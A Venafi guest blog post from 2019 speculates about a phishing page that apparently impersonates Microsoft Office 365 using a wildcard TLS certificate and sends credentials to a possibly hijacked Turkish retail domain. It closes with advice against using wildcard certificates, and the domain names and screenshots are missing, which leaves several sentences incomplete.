Skip to main content
banner image
venafi logo

Have Cyber Attackers Impersonated Microsoft’s Domain with Bogus Certificates?

Have Cyber Attackers Impersonated Microsoft’s Domain with Bogus Certificates?

Have Cyber Attackers Impersonated Microsoft’s Domain with Bogus Certificates?
May 8, 2019 | Guest Blogger: Kim Crawley


A lot of interesting finds can be discovered on Twitter. A security researcher found a webpage on for Office 365 that uses a TLS certificate which appears to be very suspicious.


What’s that * subdomain?


JavaScript code related to the page sends a user’s sensitive authentication credentials to


I decided to take the plunge and see what the website hosted through the was all about. It appeared to be a Turkish retailer of some sort.


I plugged their “About” page into Google Translate, as I don’t understand Turkish.


I can only speculate as to what’s going on with Microsoft’s domain and the domain of this Turkish glass retailer. But most likely Microsoft is being impersonated by cyber attackers. Microsoft is one of the biggest tech companies in the world. Even if you prefer to use Macs or Linux, I can pretty much guarantee that you’ve directly used their software at some point. And we also use their software indirectly through platforms like Microsoft IIS web servers, Windows Server operating systems, and Microsoft Azure cloud servers. They may have started on the client frontend in the 80s with MS-DOS and Windows, but for decades they have had a significant presence on the backend too. Their 2018 revenue was about $110.36 billion USD, and they employ many of the top minds in the computing industry. I’m confident that they wouldn’t knowingly collaborate with cyber attackers, and would think they’re securing their TLS certificates and all of their public key infrastructures like Fort Knox.

But the only reasonable assumption here is that cyber attackers have indeed impersonated their TLS systems and domain. And the * subdomain may be one that cyber attackers have created themselves. They may have been able to maliciously acquire some TLS certificates to modify for their own nefarious purposes. But more likely, they were able to generate TLS certificates for * completely on their own.


The JavaScript on what’s likely the cyber attacker’s phishing webpage for credentials collection isn’t obfuscated at all, because we can clearly see that passwords that go through that form are being sent to an address with the domain.

Is the Turkish ecommerce site for glass retailing a front for cyber crime? Why is an online store being delivered through plaintext HTTP? I’m not going to try to buy something to see if customer transaction data is sent through HTTPS. Perhaps it isn’t. Perhaps it is. It’s not worth the risk for me.

I think the more probable scenario is that the Turkish glass retailer’s site isn’t a front for cyber crime, the cyber attackers may have hijacked the domain to route their data transmissions. I mean, come on! A web store that uses HTTP?

Hopefully someone has reported this phishing incident to Microsoft.

The * subdomain in the cyber attackers’ TLS certificate marks it as a wildcard type. Any word can be used in the first part of the subdomain as * is a wildcard. It could be, it could be, it could be, it could be whatever you want.

Last October, David Bisson recommended that organizations cease using wildcard certificates. He wrote:

“Clearly, attackers are comfortable with using wildcard certificates for phishing emails attacks and other attacks. Fortunately, security controls and solutions can help block an attack. By putting these defenses in place, you increase the effort that a malicious actor must take to compromise your network. Your goal is to make compromising your network so expensive that cyber-criminals would rather focus their attention on someone else. As the saying goes: When a lion chases you, you don’t need to be the fastest runner; you just have to be faster than the person behind you.

You can make your organization more costly to exploit by avoiding wildcard certificates. Although wildcard certificates make business operations simpler, they provide tremendous opportunity to any cyber-criminal who compromises your webserver or steals a wildcard certificate’s private key.”

Maybe Microsoft got into the habit of using wildcard certificates and opened an exploit for cyber attackers who want to spoof their web apps and websites. As for the website, there’s nothing about it that looks at all secure.



Related posts

Like this blog? We think you will love this.
Featured Blog

What Is IP Spoofing?

What is IP Spoofing?

Read More
Subscribe to our Weekly Blog Updates!

Join thousands of other security professionals

Get top blogs delivered to your inbox every week

See Popular Tags

You might also like

TLS Machine Identity Management for Dummies

TLS Machine Identity Management for Dummies

Certificate-Related Outages Continue to Plague Organizations
White Paper

CIO Study: Certificate-Related Outages Continue to Plague Organizations

About the author

Guest Blogger: Kim Crawley
Guest Blogger: Kim Crawley

Kim Crawley writes about all areas of cybersecurity, with a particular interest in malware and social engineering. In addition to Venafi, she also contributes to Tripwire, AlienVault, and Cylance’s blogs. She has previously worked for Sophos and Infosecurity Magazine.

Read Posts by Author
get-started-overlay close-overlay cross icon
get-started-overlay close-overlay cross icon
Venafi Risk assessment Form Image

Sign up for Venafi Cloud

Venafi Cloud manages and protects certificates

* Please fill in this field Please enter valid email address
* Please fill in this field Password must be
At least 8 characters long
At least one digit
At last one lowercase letter
At least one uppercase letter
At least one special character
* Please fill in this field
* Please fill in this field
* Please fill in this field

End User License Agreement needs to be viewed and accepted

Already have an account? Login Here

get-started-overlay close-overlay cross icon

How can we help you?

Thank you!

Venafi will reach out to you within 24 hours. If you need an immediate answer please use our chat to get a live person.

In the meantime, please explore more of our solutions

Explore Solutions

learn more

Email Us a Question

learn more

Chat With Us

learn more